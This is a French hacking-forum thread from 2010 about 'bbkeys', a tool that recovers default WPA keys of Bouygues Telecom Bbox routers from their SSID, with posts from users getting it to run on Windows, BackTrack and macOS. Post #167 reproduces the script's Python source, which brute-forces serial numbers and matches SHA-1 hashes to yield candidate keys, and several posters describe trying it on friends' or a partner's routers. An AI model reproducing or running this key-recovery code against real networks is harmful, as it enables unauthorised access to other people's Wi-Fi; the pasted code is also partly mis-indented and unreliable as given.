Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#151 21-03-2010 18:20:35

aigle4
N00b

Re : Faille Bbox WPA (Bouygues Telecom): générateur Bbkeys (exclu: 0day)

je suis bien le proprio... c'est bizarre cette histoire, ça doit etre la personne qui est venu installer ma BBox qui a fait la manoeuvre.
En tout cas merci, ça me rassure, je suis impiratable^^

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#152 21-03-2010 23:30:22

maxlamelace
Membre Indétronable

salut, nous on a essayé avec la commande stkeys sur la bbox d'un ami, ça marche nickel pour décoder la clé, par contre on ne peut pas se connecter à internet en entrant cette clé, il me semble que c'est parce que sa clé de base à 8 caracteres hexa a été modifiée pour une clé hexa de 10 caracteres. Combien de caracteres a la tienne?

#153 13-04-2010 17:53:27

acidfire
N00b

Un petit up...

J'ai vu que quelqu'un avais parlé d'un portage sur Android. Qu'en est-il ?

#154 25-04-2010 00:01:01

doguo02
N00b

bonjour j'ai un problème au moment de rentrer le ssid de la bbox j'ai un info bulle qui affiche image ci jointe
[/u]sans_t11.png
accès refusé application win32 invalide.
j'ai déjà essayé de lancer l'application en mode de compatibilité et exécuter en mode administrateur ( windows 7 )
comment régler le problème ????
merci d'avance

Dernière modification par doguo02 (25-04-2010 00:01:59)

#155 06-05-2010 20:12:18

djolarabe
Membre Indétronable

bonjours,
j'ai télécharge le pack BBKEYS WINDOWS ET LINUX sur le site quand je souhaite ouvrir bbkeyswin impossible qu'il s'affiche d'où viens le problème ?
je précise que j'utilise vista c'est un problème de compatibilité ?

deuxieme chose en voulant l'ouvrir sous BT4 sous virtualbox en tapant la commande suivante BBKEYS comme sur ce tuto j'ai ce message:   The program 'bbkeys' is currently not installed.  You can install it by typi ng:apt-get install bbkeys bash: bbkeys: command not found
le soft et sur ma clee usb comment faire pour pouvoir l'execute sous BT4 comme sur le tuto
merci de votre aide

#156 06-05-2010 20:22:31

antares145
Membre d'honneur
Site Web

Salut Djolarabe

Je pense que les 2 problèmes sont liés : ton programme ne se trouve pas dans un dossier où le système peut le trouver et l'exécuter tout seul smile
Donc, dans l'ordre :
- Sous windows, copie l'exécutable dans C:\Windows
- Sous BT4, copie le .sh sur le bureau (par exemple) ou dans le dossier /root/ (qui correspond au bureau en fait). Ensuite, tu tapes [c]bbkeys.sh[/c], ou bien [c]sh bbkeys.sh[/c] si ca ne marche pas, et ca devrait aller wink

#157 06-05-2010 20:48:09

djolarabe
Membre Indétronable

meme en copient l'executable dans C:\Windows sa ne passe toujours pas il s'affiche le programme et par de suite
sous BT4 je n'arrive pas a faire de copier coller sa ne passe pas je n'arrive pas a le mettre sur le bureau?

#158 06-05-2010 20:52:53

antares145
Membre d'honneur
Site Web

Lance une invite de commande (Tous les programmes > Accessoires > Invite de commande), tape la commande [c]cd C:\Windows[/c] pour te mettre dans le bon dossier, et ensuite [c]bbkeyswin[/c].

Pour linux, ouvre le dossier de ta clé USB dans le navigateur de fichiers (l'icône de bbkeys doit apparaître), puis appuies sur la touche F4 du clavier > une console s'ouvre dans le bon dossier. Tu peux y taper [c]bbkeys[/c] ou bien [c]sh bbkeys[/c]

Ca marche comme ca ? smile

#159 06-05-2010 21:21:47

djolarabe
Membre Indétronable

sa me fait toujours la meme chose sous vista sa ne passe toujours pas
et dans BT c'est dans le dossier storage media que je doit trouve ma clee ? si c'est bien dans ce dossier je ne la trouve toujours pas ma clee usb
merci de ton aide antares145

#160 06-05-2010 21:32:27

goliate
Membre Irremplaçable
Site Web

oui si bt c'est bien sa mais regarde en haut (dans la barre de tache)tu vera un reload vert tu clik dessus comme si tu voulé reload ta page

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#161 06-05-2010 21:33:39

antares145
Membre d'honneur
Site Web

Bon, procédons calmement...

Windows
------------
Quand tu lances ton invite de commande, il te montre dans quel dossier il se trouve (par exemple, dans l'image 6 posts plus haut, c'est [c]C:\users\l[/c]). Copie l'exécutable bbkeyswin dans ce dossier (à partir du poste de travail), puis tu devrais pouvoir lancer le programme en tapant juste bbkeyswin (enfin, j'espère).

Linux
-------
Tu es sous Virtualbox/VMWare ? Si oui, il faut d'abord l'autoriser à utiliser la clé USB. Je pars du principe que tu es en mode live, ou installé sur disque dur. Tu débranches ta clé, tu la rebranches, puis tu tapes en console "[c]dmesg[/c]". Dans les 5-10 dernières lignes, tu vois les messages systèmes qui concernent ta clé USB, en te disant à quel disque elle correspond (par exemple, sdb1). Dans le doute, copie-moi les lignes ici wink
DOnc, maintenant que tu sais à quel emplacement correspond ta clé (ici je supposera que c'est sdb1), en console tu tapes

mkdir /mnt/usb
mount /dev/sdb1 /mnt/usb
cd /mnt/usb
ls

Il est possible que la première commande te réponde "already exists", et la dernière devrait t'afficher le contenu de ta clé (et donc entre autre [c]bbkeys.sh[/c]). Alors tu peux entrer la commande [c]sh bbkeys.sh[/c], et normalement ce coup-ci ca devrait aller big_smile

#162 06-05-2010 21:51:39

djolarabe
Membre Indétronable

merci de ton aide sa passe enfin sous windows
j'esseyrai plus tard sous BT car en tapant DMESG je ne vois pas ma clee usb de reconnu je crois bien que le probleme vient de virtualbox
connais tu la manip a faire pour qu'il puisse la reconnaitre ?

#163 06-05-2010 23:14:41

djolarabe
Membre Indétronable

M1ck3y ton soft marche du tonnerre c'est du full PoWeR  merci pour le partage big_smile

#164 10-05-2010 20:02:25

xrace1
N00b

bonjour, j'ai essayer le soft bbkeys, mais il y a un hic, pour la box de ma chérie, impossible de trouver la clé, pourquoi? le soft ne fonctionne-t-il pas avec certain "noms" de box?

#165 10-05-2010 20:31:07

goliate
Membre Irremplaçable
Site Web

xrace1 a écrit :

bonjour, j'ai essayer le soft bbkeys, mais il y a un hic, pour la box de ma chérie, impossible de trouver la clé, pourquoi? le soft ne fonctionne-t-il pas avec certain "noms" de box?

il fonctionne avec les nom et les clé par défaut.(Donc si elle a changé sa clé c'est foutu ^^ ou bien même juste changer un chiffre dans l'essid, du style sa bbox par défaut bbox-0000 et quelle a mis en essid bbox-0007.Et bien sa ne marchera pas, je suis méchant de changé le num de ma bbox mais j'aime bien faire rager les lamerz ><).

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#166 17-05-2010 18:01:40

MrGun
Membre

Bonjour, bonjour, C'est moi que j'arrive sur votre forum fort intéressant ^^.
Alors voila, moi j'ai un macbook donc Bbkeys n'est pas compatible mais j'ai vu qu'il y avait l'équivalent en python, or, moi je n'y connais rien en .py mais quand même j'essaye.
J'ai téléchargé la version 2.6 pour être sur d'être à jour avant de venir vous embêter.
Si quelqu'un peut me guider pour exécuter le fichier, je lui en serait très reconnaissant. smile

#167 17-05-2010 19:20:50

MrGun
Membre

Quand j'ouvre bbkeys j'obtiens ça:

#!/usr/bin/python
# -*- coding: mac_roman -*-

import sha
from datetime import date
from optparse import OptionParser

parser = OptionParser()
parser.add_option("-i", "--ssid", dest="ssid",
                  help="SSID of the box", default='')

(options, args) = parser.parse_args()
ssid = options.ssid
if ssid == '':
  print "No key provided. Launch with -h for help."
else:
  print "Searching keys for SSID %s" % ssid
  hexaend = ssid[-6:].lower()

hexvalues = []
  for i in xrange(ord('A'), ord('Z')+1):
    hexvalues.append(hex(i)[-2:].upper())
  for i in xrange(ord('0'), ord('9')+1):
    hexvalues.append(hex(i)[-2:].upper())

candidates = []
  for y in xrange(2008, date.today().year+1):
    print "Year %d..." % y
    for w in xrange(101, 152):
      snb = 'CP'+str(y)[-2:]+str(w)[-2:]
      for X in hexvalues:
        snb2 = snb+X
        for Y in hexvalues:
         snb3 = snb2+Y
         for Z in hexvalues:
           sn_sha = sha.sha(snb3+Z).hexdigest()
           if sn_sha[-6:] == hexaend:
             candidates.append(sn_sha[:10].upper())

if len(candidates) == 0:
    print "No keys found."
  else:
    print "Candidates:"
    for key in candidates:
      print '  '+key

Une fois que j'en suis là, que dois-je faire?

#168 17-05-2010 19:31:42

antares145
Membre d'honneur
Site Web

Salut MrGun, bienvenue sur le forum

Juste un détail : ici tu es sur le topic de présentation de l'outil, qui commence à être fort chargé... Si la discussion se prolonge, ca serait bien que tu crées un nouveau sujet "bbkeyswin sous MacOS" wink

Bon, dans l'ordre, tu dois
- Vérifier que python est installé chez toi (normalement c'est le cas par défaut, pour vérifier --> Python on the Macintosh)
- Ouvrir un terminal (Applications > Utilitaires > Terminal)
- Te placer dans le bon dossier (par exemple, si bbkeys.py est sur le bureau, tu tapes [c]cd Desktop[/c])
- Lancer la commande [c]python ./bbkeyswin.py[/c] et croiser les doigts wink

S'il te dit "command not found" c'est que tu n'es pas dans le bon dossier, vérifie la liste des fichiers présents avec la commande "ls". Normalement, il devrait se lancer et te prévenir que tu ne lui as pas donné d'argument (normal). Utilise [c]python ./bbkeyswin.py -h[/c] pour accéder à l'aide et voir comment utiliser le programme (je me souviens pas exactement).

Ca marche comme ca ? smile

#169 17-05-2010 19:44:23

MrGun
Membre

Salut Antares et merci pour ton aide.
Alors j'ai fais comme tu as dis, le dossier étant sur mon bureau sous le nom de ./bbk.py, j'ai fais cd desktop, là ça roule, après j'ai fais bbk.py et ça me renvoie "permission denied". C'est foutu?

Dernière modification par MrGun (17-05-2010 19:45:12)

#170 17-05-2010 19:49:12

antares145
Membre d'honneur
Site Web

Heu, oui et non j'en sais rien en fait, j'y connais pas grand chose en Mac... Tu peux essayer la commande suivante (sur le bureau) : [c]chmod 777 bbk.py[/c], pour donner toutes les permissions à tout le monde. Mais je garantis rien hmm

Tu as bien tapé "[c]python bbk.py[/c]" pour le lancer ?

#171 17-05-2010 19:56:15

MrGun
Membre

Ah j'avais oublié le "python" au début. Mais bon j'ai donc refait la manip' mais là ça me met:   
File "./bbk.py", line 31
    k      snb = 'CP'+str(y)[-2:]+str(w)[-2:]
    ^
IndentationError: expected an indented block

#172 17-05-2010 20:03:06

antares145
Membre d'honneur
Site Web

Bon, oké, à tous les coups, ca ca pue la version de Python incompatible, ou un passage foireux entre les encodages Linux & Mac...

Essaie d'ouvrir le fichier avec un éditeur de texte, et vérifie que tu as bien une tabulation au début de la ligne en question, et pas une simple succession d'espaces. En gros, tu vires tous les espaces et tu mets une seule TAB à la place (la touche à gauche du clavier avec les 2 flèches).
Idem pour toutes les boucles for, à chaque fois que tu entres dedans la ligne suivante doit avoir un TAB de plus (pour indiquer qu'elle fait partie du FOR) --> voir [Python] Indentation Error dans boucle While [Résolu] (pardon à Qwertazert pour le lien CCM s'il passe par ici lol)

Je sais pas si je suis clair, mais si ca ne marche toujours pas, crée un nouveau sujet dans la section "Backtrack, outils de pentesting & Linux en général", avec un bon titre et un rappel de l'erreur, merci wink

PS : le python ca fait loin pour moi, donc je risque de pas pouvoir t'aider beaucoup plus wink

#173 17-05-2010 20:43:27

MrGun
Membre

Alors j'ai fais comme tu m'as dis et j'ai mis une tabulation supplémentaire à chaque nouvelle ligne commençant par for mais le problème d'indentation s'est décalé de la ligne 31 à la ligne 30 et là je ne vois pas ce que je peux changer.

Je vais ouvrir un nouveau post dans la section que tu m'as conseillé et je te tiens au courant si j'arrive à trouver la solution.

En tout cas merci beaucoup pour ton aide, maintenant on sait exactement où se trouve le problème.

#174 21-05-2010 02:28:46

glock818
Membre Hyperactif

bbkeys marche pour backtrack4?

La securite est illusoire....

#175 26-05-2010 07:03:54

juliette
Membre V.I.P.

merci ça marche impeccable wink

le principe pourrait etre adapté aux livebox et neufbox ?

[c]Il faut 1024 mètres pour faire 1 kilomètre[/c]

Annonce